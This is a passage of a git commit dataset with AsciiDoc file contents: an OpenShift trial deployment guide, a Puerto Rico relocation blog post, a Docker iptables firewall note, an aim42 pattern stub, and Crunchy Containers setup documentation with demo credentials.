include permanent storage. Assets that you create or modify in a trial environment are not saved. \n\nThis environment is intended for test and demonstration access. It supports cross-origin resource sharing (CORS). This means that {KIE_SERVER} endpoints can be accessed using a browser when other resources on the page are provided by other servers. {KIE_SERVER} endpoints are normally intended for REST calls, but browser access can be needed in some demonstration configurations. \n\nThe procedure is minimal. There are no required settings and all passwords are set to a single value (the default password is `RedHat`).\n\nTo deploy a single authoring environment, use the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` template file. You can extract this file from the `{PRODUCT_FILE}-openshift-templates.zip` product deliverable file. You can download the file from the {PRODUCT_DOWNLOAD_LINK}[Software Downloads] page.\n\n.Procedure\n\n. Use one of the following methods to deploy the template:\n* In the OpenShift Web UI, select *Add to Project -> Import YAML \/ JSON* and then select or paste the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` file. In the *Add Template* window, ensure *Process the template* is selected and click *Continue*.\n* To use the OpenShift command line console, prepare the following command line:\n+\n[subs=\"attributes,verbatim,macros\"]\n----\noc new-app -f <template-path>\/{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml \n----\n+\nIn this command line, replace `<template-path>` with the path to the downloaded template file.\n. Optionally, set any parameters as described in the template. However, a typical trial deployment does not require any parameters.\n. Complete the creation of the environment, depending on the method that you are using:\n* In the OpenShift Web UI, click *Create*.\n* Complete and run the command line.\n\n","old_contents":"[id='environment-trial-proc']\n= Deploying a trial environment\n\nYou can deploy a trial (evaluation) {PRODUCT} environment. It consists of {CENTRAL} for authoring or managing services and {KIE_SERVER} for test execution of services. \n\nThis environment does not include permanent storage. Assets that you create or modify in a trial environment are not saved. \n\nThe procedure is minimal. There are no required settings and all passwords are set to a single value (the default password is `RedHat`).\n\nTo deploy a single authoring environment, use the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` template file. You can extract this file from the `{PRODUCT_FILE}-openshift-templates.zip` product deliverable file. You can download the file from the {PRODUCT_DOWNLOAD_LINK}[Software Downloads] page.\n\n.Procedure\n\n. Use one of the following methods to deploy the template:\n* In the OpenShift Web UI, select *Add to Project -> Import YAML \/ JSON* and then select or paste the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` file. In the *Add Template* window, ensure *Process the template* is selected and click *Continue*.\n* To use the OpenShift command line console, prepare the following command line:\n+\n[subs=\"attributes,verbatim,macros\"]\n----\noc new-app -f <template-path>\/{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml \n----\n+\nIn this command line, replace `<template-path>` with the path to the downloaded template file.\n. Optionally, set any parameters as described in the template. However, a typical trial deployment does not require any parameters.\n. Complete the creation of the environment, depending on the method that you are using:\n* In the OpenShift Web UI, click *Create*.\n* Complete and run the command line.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da9cedb44896f3dcd314f7752890a1d62eb9730a","subject":"Update 2015-07-08-Preguntas-preguntas-preguntas.adoc","message":"Update 2015-07-08-Preguntas-preguntas-preguntas.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-08-Preguntas-preguntas-preguntas.adoc","new_file":"_posts\/2015-07-08-Preguntas-preguntas-preguntas.adoc","new_contents":"= Preguntas, preguntas, preguntas\u2026\n:hp-image: IMG_0606.jpg\n\nWe\u2019re in our final days of living stateside. Technically we\u2019re homeless but the wonderful community of family and friends we have has allowed us to couch surf until we take off to PR. Backyard BBQ\u2019s and lazy summer days with family and friends only continue to confirm the fact that we are so fortunate to be able to have this opportunity to pick up and go. We hope to have many more of these enjoyable days as our mainland connections come visit us on the island of enchantment.\n\nWe\u2019ve been getting a lot of questions about the island, our intentions while there, and our feelings about going - considering how much the 2 of us have moved over the past 6 years this sort of move isn\u2019t all that daunting to us, but I can see how it might be from a less nomadic person\u2019s perspective. Below I\u2019ve attempted to answer some of the more common questions we\u2019ve gotten over the last few weeks and some we\u2019ve had to really think to answer ourselves. \n\n - *Do you need a passport to go?* Only if you\u2019re not a US Citizen or if you\u2019re flying in from another country. US Citizens or flights from within the US don\u2019t have any customs requirements to visit Puerto Rico as it is a US Territory.\n\n - *Do you need to apply to live or work in Puerto Rico?* Again, if you\u2019re a US Citizen, nope! Moving to PR is just like moving to any other state. The difference for work is the income tax you pay. Because Puerto Rico doesn\u2019t have official representation in the US Congress, Puerto Rican residents are not subject to federal income tax. With that said, we\u2019ll be consulting a CPA to make sure we file correctly next year since we\u2019ll have lived half this year in the states and Alejandro will be working as an independent contractor.\n\n - *What is the closest mainland state to PR?* Puerto Rico is about 1000 miles or a 2.5 hr flight from Miami. The island is situated at the point where the Caribbean and Atlantic Ocean meet. The closest island nation is the Dominican Republic.\n\n- *Can you get all the essentials and comforts of home?* Like anywhere, Puerto Rico has metropolitan areas and rural areas. With the island being only 100 miles long by 35 miles wide, all of these areas are within a day\u2019s drive. Our initial home, in Carolina, is within the San Juan metropolitan area and is very close to many shopping areas and stores including Bed Bath and Beyond, Walgreens, CVS, Dave\u2019s Famous BBQ, Walmart, and Costco. Since we are big proponents of supporting the local community we are very excited to try local varieties of fruits, vegetables, and meats. I\u2019ve already researched the farmers markets and fish mongers in the area. If you\u2019re interested here are some I plan on exploring initially - http:\/\/www.puertoricodaytrips.com\/rio-piedras-market\/[Rio Piedras Farmer\u2019s Market] and http:\/\/www.marisqueriaatlantica.com\/marisqueria.php?id=2[Marqueseria Atlantica]. I\u2019m sure once we\u2019re on the ground we\u2019ll find more places to explore\u2026we\u2019ll keep you up to date on what we find. Where Alejandro\u2019s family property is, in Rincon, is a little more rural. Think beach\/farm community with a small downtown and no traffic signals. There we will have smaller grocers and stores but there is still a farmers market, an organic grocery store, a local hardware store and Mayaguez is a city of about 85,000 and about a 45 minute drive away (without traffic).\n\n- *Is it safe?* Like anywhere else, there are pockets of the metropolitan areas you should be vigilant in and be aware of your surroundings, but its not unlike being in any other metropolitan area. Crime varies from city to city just like it does on the mainland and occurs with less frequency in the rural areas.\n\n- *Do you have to know Spanish?* Knowing Spanish is not a necessity to get around in Puerto Rico but learning it will help you tremendously if you plan on living there. Many Puerto Ricans speak english to one degree or another. I\u2019m using Duolingo to improve upon my Spanish and luckily Alejandro is fluent.\n\n - *Are you anxious about going?* While I\u2019m anxious to get *TO* Puerto Rico and not be living out of my backpack I don\u2019t have any anxiety about going. I\u2019m excited for the new adventure that awaits us and I\u2019m truly looking forward to soaking up the sun and seeing what path we will end up on. Excitement yes, anxiety no.\n\n - *What are you going to do?* This is a question that really has no answer. I plan on exploring, learning the culture, the environment, and the people. I\u2019ve been doing a lot of research on the various environmental programs happening throughout the island and hope to be able to get involved with some of these groups. We will also be assessing the work that needs to be done on the property, meeting with lawyers, submitting necessary paperwork for the property and enjoying the occasional coconut. \n\n - *Can you find sushi?* Yes! Don\u2019t worry, we will research and report back and will have recommendations for those that visit.\n\n- *Where is all your stuff?* We\u2019ve managed to consolidate or sell most of our stuff. Many of our friends have been the lucky recipients of kitchenware, plants, baking items, furniture, and even clothes. The things we did keep (nicer kitchen items, mementos, records, a few pieces of furniture) have been packed up and are in my mom\u2019s garage. Depending on where we end up or how long we stay here will determine when we reunite with these possessions. For now, we\u2019re taking 5 suitcases and 2 backpacks that contain mostly clothes and essentials. Even though we move pretty often, we\u2019d been in our apartment a year and half and its amazing how much you collect in a short period of time. Even just the amount of change we found throughout the house was incredible! Note - most banks won\u2019t take loose change and some won\u2019t even take rolled change\u2026we had to settle for Coinstar taking their 10%\u2026\n\n.Our Puerto Rico Baggage\nimage:IMG_0607.jpg[Puerto Rico Baggage]\n\n - *How will you get around?* This is mostly a question we get from our San Francisco friends. We haven\u2019t owned a car in years since we never needed one in the city. We\u2019ll be renting a car using our airline mile points for about a week and we have already searched online for some possible locations to buy a car when we get to PR. \n\n - *Will your phone work there?* Yep! Cell phone use in Puerto Rico is the same as if you\u2019re in the mainland. Our phone numbers will remain the same and we hope to continue getting phone calls and text messages from everyone!\n\n- *What\u2019s the weather like?* Puerto Rico has some of the most consistent temperatures year round with highs staying in the upper 80\u2019s and lows in the mid 70\u2019s. Hurricane season ranges from August through October with a major hurricane gracing the island around every 7 years. \n\n - *What clothes did you pack?* This was a pretty difficult question for me to answer while I was going through my clothes. Being used to summers in San Francisco its was very difficult for me to part with my summer sweaters and jackets. I gave away a lot, packed a few in storage, and brought a couple that I just couldn\u2019t part with. Taking a sweater everywhere I go is going to be hard to give up initially but I\u2019m sure I\u2019ll acclimate to island temperature very quickly. For the most part my suitcases are filled with shorts, t-shirts, tank tops, skirts, and dresses - pretty much the items I only got to wear on occasion in San Francisco.\n\n- *What has been the hardest part of this move?* This is a loaded question. Leaving our friends and family that we see on a regular basis will definitely be the most difficult. In terms of practical changes we\u2019ve had to make I could say deciding which clothes and household items to keep and what to give away; I could say all the trips to Goodwill when our things wouldn\u2019t sell on Craigslist\u2026but the most difficult moving task we\u2019ve faced is changing our address! Addresses in Puerto Rico are often very different than here in the states, with your address being a kilometer distance on a particular road in a barrio within a city. Even putting in a request for a change of address with USPS proved challenging. We\u2019ve had to call pretty much every vendor we have bills with to change our address and even had to close a few accounts that won\u2019t accept an address outside the 50 states. Some changes will have to wait until we have a PO Box in Puerto Rico that we can use as an address since our kilometer number doesn\u2019t work for some businesses. For those of you wanting to send mail, we\u2019ll update you with our PO Box information once we have it.\n\n- *Will you miss San Francisco?* Absolutely!! SF has been my home for many years and will always be one of my favorite cities. I have wonderful friends and great memories of the bay area and will always consider it a part of me. We might live there again, we might not, but we will always return for visits.\n\nI fully expect questions from ourselves, from family & friends to never end during this adventure and indeed I welcome them. If you are curious about anything related to Puerto Rico or our move in general don\u2019t hesitate to ask us in the comments and we\u2019ll try to answer as best we can. Hopefully as we discover Puerto Rico we\u2019ll be able to answer a lot more questions and we\u2019ll definitely keep you all informed of what we learn!\n\n","old_contents":"= Preguntas, preguntas, preguntas\u2026\n:hp image:IMG_0606.jpg\n\nWe\u2019re in our final days of living stateside. Technically we\u2019re homeless but the wonderful community of family and friends we have has allowed us to couch surf until we take off to PR. Backyard BBQ\u2019s and lazy summer days with family and friends only continue to confirm the fact that we are so fortunate to be able to have this opportunity to pick up and go. We hope to have many more of these enjoyable days as our mainland connections come visit us on the island of enchantment.\n\nWe\u2019ve been getting a lot of questions about the island, our intentions while there, and our feelings about going - considering how much the 2 of us have moved over the past 6 years this sort of move isn\u2019t all that daunting to us, but I can see how it might be from a less nomadic person\u2019s perspective. Below I\u2019ve attempted to answer some of the more common questions we\u2019ve gotten over the last few weeks and some we\u2019ve had to really think to answer ourselves. \n\n - *Do you need a passport to go?* Only if you\u2019re not a US Citizen or if you\u2019re flying in from another country. US Citizens or flights from within the US don\u2019t have any customs requirements to visit Puerto Rico as it is a US Territory.\n\n - *Do you need to apply to live or work in Puerto Rico?* Again, if you\u2019re a US Citizen, nope! Moving to PR is just like moving to any other state. The difference for work is the income tax you pay. Because Puerto Rico doesn\u2019t have official representation in the US Congress, Puerto Rican residents are not subject to federal income tax. With that said, we\u2019ll be consulting a CPA to make sure we file correctly next year since we\u2019ll have lived half this year in the states and Alejandro will be working as an independent contractor.\n\n - *What is the closest mainland state to PR?* Puerto Rico is about 1000 miles or a 2.5 hr flight from Miami. The island is situated at the point where the Caribbean and Atlantic Ocean meet. The closest island nation is the Dominican Republic.\n\n- *Can you get all the essentials and comforts of home?* Like anywhere, Puerto Rico has metropolitan areas and rural areas. With the island being only 100 miles long by 35 miles wide, all of these areas are within a day\u2019s drive. Our initial home, in Carolina, is within the San Juan metropolitan area and is very close to many shopping areas and stores including Bed Bath and Beyond, Walgreens, CVS, Dave\u2019s Famous BBQ, Walmart, and Costco. Since we are big proponents of supporting the local community we are very excited to try local varieties of fruits, vegetables, and meats. I\u2019ve already researched the farmers markets and fish mongers in the area. If you\u2019re interested here are some I plan on exploring initially - http:\/\/www.puertoricodaytrips.com\/rio-piedras-market\/[Rio Piedras Farmer\u2019s Market] and http:\/\/www.marisqueriaatlantica.com\/marisqueria.php?id=2[Marqueseria Atlantica]. I\u2019m sure once we\u2019re on the ground we\u2019ll find more places to explore\u2026we\u2019ll keep you up to date on what we find. Where Alejandro\u2019s family property is, in Rincon, is a little more rural. Think beach\/farm community with a small downtown and no traffic signals. There we will have smaller grocers and stores but there is still a farmers market, an organic grocery store, a local hardware store and Mayaguez is a city of about 85,000 and about a 45 minute drive away (without traffic).\n\n- *Is it safe?* Like anywhere else, there are pockets of the metropolitan areas you should be vigilant in and be aware of your surroundings, but its not unlike being in any other metropolitan area. Crime varies from city to city just like it does on the mainland and occurs with less frequency in the rural areas.\n\n- *Do you have to know Spanish?* Knowing Spanish is not a necessity to get around in Puerto Rico but learning it will help you tremendously if you plan on living there. Many Puerto Ricans speak english to one degree or another. I\u2019m using Duolingo to improve upon my Spanish and luckily Alejandro is fluent.\n\n - *Are you anxious about going?* While I\u2019m anxious to get *TO* Puerto Rico and not be living out of my backpack I don\u2019t have any anxiety about going. I\u2019m excited for the new adventure that awaits us and I\u2019m truly looking forward to soaking up the sun and seeing what path we will end up on. Excitement yes, anxiety no.\n\n - *What are you going to do?* This is a question that really has no answer. I plan on exploring, learning the culture, the environment, and the people. I\u2019ve been doing a lot of research on the various environmental programs happening throughout the island and hope to be able to get involved with some of these groups. We will also be assessing the work that needs to be done on the property, meeting with lawyers, submitting necessary paperwork for the property and enjoying the occasional coconut. \n\n - *Can you find sushi?* Yes! Don\u2019t worry, we will research and report back and will have recommendations for those that visit.\n\n- *Where is all your stuff?* We\u2019ve managed to consolidate or sell most of our stuff. Many of our friends have been the lucky recipients of kitchenware, plants, baking items, furniture, and even clothes. The things we did keep (nicer kitchen items, mementos, records, a few pieces of furniture) have been packed up and are in my mom\u2019s garage. Depending on where we end up or how long we stay here will determine when we reunite with these possessions. For now, we\u2019re taking 5 suitcases and 2 backpacks that contain mostly clothes and essentials. Even though we move pretty often, we\u2019d been in our apartment a year and half and its amazing how much you collect in a short period of time. Even just the amount of change we found throughout the house was incredible! Note - most banks won\u2019t take loose change and some won\u2019t even take rolled change\u2026we had to settle for Coinstar taking their 10%\u2026\n\n.Our Puerto Rico Baggage\nimage:IMG_0607.jpg[Puerto Rico Baggage]\n\n - *How will you get around?* This is mostly a question we get from our San Francisco friends. We haven\u2019t owned a car in years since we never needed one in the city. We\u2019ll be renting a car using our airline mile points for about a week and we have already searched online for some possible locations to buy a car when we get to PR. \n\n - *Will your phone work there?* Yep! Cell phone use in Puerto Rico is the same as if you\u2019re in the mainland. Our phone numbers will remain the same and we hope to continue getting phone calls and text messages from everyone!\n\n- *What\u2019s the weather like?* Puerto Rico has some of the most consistent temperatures year round with highs staying in the upper 80\u2019s and lows in the mid 70\u2019s. Hurricane season ranges from August through October with a major hurricane gracing the island around every 7 years. \n\n - *What clothes did you pack?* This was a pretty difficult question for me to answer while I was going through my clothes. Being used to summers in San Francisco its was very difficult for me to part with my summer sweaters and jackets. I gave away a lot, packed a few in storage, and brought a couple that I just couldn\u2019t part with. Taking a sweater everywhere I go is going to be hard to give up initially but I\u2019m sure I\u2019ll acclimate to island temperature very quickly. For the most part my suitcases are filled with shorts, t-shirts, tank tops, skirts, and dresses - pretty much the items I only got to wear on occasion in San Francisco.\n\n- *What has been the hardest part of this move?* This is a loaded question. Leaving our friends and family that we see on a regular basis will definitely be the most difficult. In terms of practical changes we\u2019ve had to make I could say deciding which clothes and household items to keep and what to give away; I could say all the trips to Goodwill when our things wouldn\u2019t sell on Craigslist\u2026but the most difficult moving task we\u2019ve faced is changing our address! Addresses in Puerto Rico are often very different than here in the states, with your address being a kilometer distance on a particular road in a barrio within a city. Even putting in a request for a change of address with USPS proved challenging. We\u2019ve had to call pretty much every vendor we have bills with to change our address and even had to close a few accounts that won\u2019t accept an address outside the 50 states. Some changes will have to wait until we have a PO Box in Puerto Rico that we can use as an address since our kilometer number doesn\u2019t work for some businesses. For those of you wanting to send mail, we\u2019ll update you with our PO Box information once we have it.\n\n- *Will you miss San Francisco?* Absolutely!! SF has been my home for many years and will always be one of my favorite cities. I have wonderful friends and great memories of the bay area and will always consider it a part of me. We might live there again, we might not, but we will always return for visits.\n\nI fully expect questions from ourselves, from family & friends to never end during this adventure and indeed I welcome them. If you are curious about anything related to Puerto Rico or our move in general don\u2019t hesitate to ask us in the comments and we\u2019ll try to answer as best we can. Hopefully as we discover Puerto Rico we\u2019ll be able to answer a lot more questions and we\u2019ll definitely keep you all informed of what we learn!\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7c949300c479dc502e9cbf0496a6a416eec2977a","subject":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","message":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_contents":"= Firewall Docker with Iptables\n\n\n[source, bash]\n--------------------------------------------------\n# New intercept chain\niptables -N PRE_DOCKER\n# Jump to intercept chain\niptables -I FORWARD -j PRE_DOCKER\n# Logging for debug (see below)\n# iptables -A PRE_DOCKER -j LOG\n# Return from where we jump if it is an IP we trust (replace 256 with an IP you trust)\niptables -A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n# Drop it by default\niptables -A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nThe finish iptables rules (`iptables -S`) would look like\n\n[source, iptables]\n--------------------------------------------------\nsome -P here...\n-N DOCKER\n-N DOCKER-INGRESS\n-N DOCKER-ISOLATION\n-N DOCKER-USER\n-N PRE_DOCKER\n-A FORWARD -j PRE_DOCKER\n-A FORWARD -j DOCKER-USER\n-A FORWARD -j DOCKER-INGRESS\n-A FORWARD -j DOCKER-ISOLATION\n-A FORWARD -o docker_gwbridge -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker_gwbridge -j DOCKER\n-A FORWARD -i docker_gwbridge ! -o docker_gwbridge -j ACCEPT\n-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker0 -j DOCKER\n-A FORWARD -i docker0 ! -o docker0 -j ACCEPT\n-A FORWARD -i docker0 -o docker0 -j ACCEPT\n-A FORWARD -i docker_gwbridge -o docker_gwbridge -j DROP\nsome -A DOCKER-* here...\n-A PRE_DOCKER -j LOG\n-A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n-A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nif `-A PRE_DOCKER -j LOG` is there, you would find the log in `\/var\/log\/syslog` that explain the need of `-i eth0` and `-i docker0`\n\n[source, iptables]\n--------------------------------------------------\nDec 7 16:14:23 ds06 kernel: [164304.277225] IN=eth0 OUT=docker0 MAC= SRC=A DST=B LEN=64 TOS=0x00 PREC=0x00 TTL=47 ID=34183 DF PROTO=TCP SPT=61065 DPT=7200 WINDOW=65535 RES=0x00 SYN URGP=0\nDec 7 16:14:23 ds06 kernel: [164304.277307] IN=docker0 OUT=eth0 PHYSIN=veth730785d MAC= SRC=B DST=A LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=7200 DPT=61065 WINDOW=28960 RES=0x00 ACK SYN URGP=0\n--------------------------------------------------\n\n\n\nhttps:\/\/wiki.centos.org\/HowTos\/Network\/IPTables\nhttps:\/\/forums.docker.com\/t\/restricting-external-container-access-with-iptables\/2225\/4\n\n","old_contents":"= Firewall Docker with Iptables\n\n\n[source, bash]\n--------------------------------------------------\n# New intercept chain\niptables -N PRE_DOCKER\n# Jump to intercept chain\niptables -I FORWARD -j PRE_DOCKER\n# Logging for debug (see below)\n# iptables -A PRE_DOCKER -j LOG\n# Return from where we jump if it is an IP we trust (replace 256 with an IP you trust)\niptables -A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n# Drop it by default\niptables -A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nThe finish iptables rules (`iptables -S`) would look like\n\n[source, iptables]\n--------------------------------------------------\nsome -P here...\n-N DOCKER\n-N DOCKER-INGRESS\n-N DOCKER-ISOLATION\n-N DOCKER-USER\n-N PRE_DOCKER\n-A FORWARD -j PRE_DOCKER\n-A FORWARD -j DOCKER-USER\n-A FORWARD -j DOCKER-INGRESS\n-A FORWARD -j DOCKER-ISOLATION\n-A FORWARD -o docker_gwbridge -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker_gwbridge -j DOCKER\n-A FORWARD -i docker_gwbridge ! -o docker_gwbridge -j ACCEPT\n-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker0 -j DOCKER\n-A FORWARD -i docker0 ! -o docker0 -j ACCEPT\n-A FORWARD -i docker0 -o docker0 -j ACCEPT\n-A FORWARD -i docker_gwbridge -o docker_gwbridge -j DROP\nsome -A DOCKER-* here...\n-A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n-A PRE_DOCKER -j LOG\n-A PRE_DOCKER -s 87.224.30.70\/32 -i docker0 -j RETURN\n-A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nhttps:\/\/wiki.centos.org\/HowTos\/Network\/IPTables\nhttps:\/\/forums.docker.com\/t\/restricting-external-container-access-with-iptables\/2225\/4\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5330911eee0eae196b879525e2ef6d1a11fbc7dd","subject":"updated plan-improvement","message":"updated plan-improvement\n","repos":"aim42\/aim42,rschimmack\/aim42,kitenco\/aim42,rschimmack\/aim42,feststelltaste\/aim42,feststelltaste\/aim42,aim42\/aim42,kitenco\/aim42","old_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_contents":"\n[[Plan-Improvements]]\n=== [pattern]#Plan Improvements#\nConduct long- and short-term planning of improvement activities. Balance\nor align issues and improvements, considering existing goals and constraints.\n\nConsists of long-term decisions (concerning <<Improvement-Approaches>>) and\nshort-term planning.","old_contents":"\n[[Plan-Improvements]]\n=== [pattern]#Plan Improvements#\nConduct long- and short-term planning of improvement activities. Balance\nor align issues and improvements, considering existing goals and constraints.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c8c377f4628ed03fad534ef1e15c0644fa5acf5","subject":"Added default credentials for Grafana.","message":"Added default credentials for Grafana.\n","repos":"the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers","old_file":"hugo\/content\/getting-started\/kubernetes-and-openshift\/_index.adoc","new_file":"hugo\/content\/getting-started\/kubernetes-and-openshift\/_index.adoc","new_contents":"---\ntitle: \"Kubernetes and Openshift\"\ndate: 2018-05-15T08:30:41-07:00\ndraft: false\n---\n\n:toc:\nLatest Release: 2.2.0 {docdate}\n\n== Getting Started\n\n{{% notice warning %}}\nThe Kubernetes and OpenShift examples provided on this page have been designed using single-node Kubernetes\/OCP clusters\nwhose host machines provide any required supporting infrastructure or services (e.g. local hostPath storage or access\nto an NFS share). Therefore, for the best results when running these examples, it is recommended that you utilize a \nsingle-node architecture as well.\n{{% \/notice %}}\n\n{{% notice tip %}}\nThe examples located in the *kube* directory work on both Kubernetes and OpenShift. Ensure the `CCP_CLI` environment variable\nis set to the correct binary for your environment.\n{{% \/notice %}}\n\nSet the environment variable in `.bashrc` to ensure the examples will work in your environment.\n....\n# Kubernetes\nexport CCP_CLI=kubectl\n\n# OpenShift\nexport CCP_CLI=oc\n....\n\nHere are some useful resources for finding the right commands to troubleshoot & modify containers in\nthe various environments shown in this guide:\n\n* link:http:\/\/www.bogotobogo.com\/DevOps\/Docker\/Docker-Cheat-Sheet.php[Docker Cheat Sheet]\n* link:https:\/\/kubernetes.io\/docs\/user-guide\/kubectl-cheatsheet\/[Kubectl Cheat Sheet]\n* link:https:\/\/github.com\/nekop\/openshift-sandbox\/blob\/master\/docs\/command-cheatsheet.md[OpenShift Cheat Sheet]\n* link:https:\/\/github.com\/kubernetes\/helm\/blob\/master\/docs\/using_helm.md[Helm Cheat Sheet]\n\n== Example Conventions\n\nThe examples provided in Container Suite are simple examples that\nare meant to demonstrate key Container Suite features. These\nexamples can be used to build more production level deployments\nas dictated by user requirements specific to their operating\nenvironments.\n\nThe examples generally follow these conventions:\n\n * There is a *run.sh* script that you will execute to start the example.\n * There is a *cleanup.sh* script that you will execute to shutdown and cleanup the example.\n * Each example will create resources such as Secrets, ConfigMaps, Services, and PersistentVolumeClaims, all which follow a naming convention of *<example name>-<optional description suffix>*. For example an example called *primary* might have a PersistentVolumeClaim called *primary-pgconf* to describe the purpose of that particular PVC.\n * The folder names for each example give a clue as to which Container Suite feature it demonstrates. For instance, the *examples\/kube\/pgaudit* example demonstrates how to enable the pg_audit capability of the crunchy-postgres container.\n\n== Administration\n\n=== Password Management\n\nThe passwords used for the PostgreSQL user accounts are generated\nby the OpenShift `process` command. To inspect what value is\nsupplied, you can inspect the primary pod as follows:\n\n....\n${CCP_CLI} get pod pr-primary -o json | grep -C 1 'PG_USER\\|PG_PASSWORD\\|PG_DATABASE'\n....\n\nThis will give you the environment variable values for the database created by default\nin addition to the username and password of the standard user.\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_DATABASE`\n\n=== Kubernetes Secrets\n\nYou can use Kubernetes Secrets to set and maintain your database\ncredentials. Secrets requires you base64 encode your user and password\nvalues as follows:\n....\necho -n 'myuserid' | base64\n....\n\nYou will paste these values into your JSON secrets files for values.\n\nThis example allows you to set the PostgreSQL passwords\nusing Kubernetes Secrets.\n\nThe secret uses a base64 encoded string to represent the\nvalues to be read by the container during initialization. The\nencoded password value is *password*. Run the example\nas follows:\n\n....\ncd $CCPROOT\/examples\/kube\/secret\n.\/run.sh\n....\n\nThe secrets are mounted in the `\/pguser`, `\/pgprimary`, and `\/pgroot` volumes within the\ncontainer and read during initialization. The container\nscripts create a PostgreSQL user with those values, and sets the passwords\nfor the primary user and PostgreSQL superuser using the mounted secret volumes.\n\nWhen using secrets, you do *NOT* have to specify the following\nenvironment variables if you specify all three secrets volumes:\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_ROOT_PASSWORD`\n * `PG_PRIMARY_USER`\n * `PG_PRIMARY_PASSWORD`\n\nYou can test the container as follows. In all cases, the password is *password*:\n....\npsql -h secret -U pguser1 postgres\npsql -h secret -U postgres postgres\npsql -h secret -U primaryuser postgres\n....\n\n=== pgAdmin4\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL without TLS.\n\nAfter running the example, you should be able to browse to http:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username : *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-http 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *http:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgAdmin4 documentation] for more details.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-http\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-http\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== pgAdmin4 with TLS\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL with TLS.\n\nAfter running the example, you should be able to browse to https:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username : *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-https 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *https:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgadmin4 documentation] for more details.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-https\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-https\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== Upgrade\n\n{{% notice tip %}}\nThis example assumes you have run *primary* using a PG 9.5 or 9.6 image\nsuch as `centos7-9.5.14-2.2.0` prior to running this upgrade.\n{{% \/notice %}}\n\nStarting in release 1.3.1, the upgrade container will let\nyou perform a `pg_upgrade` either from a PostgreSQL version 9.5 database 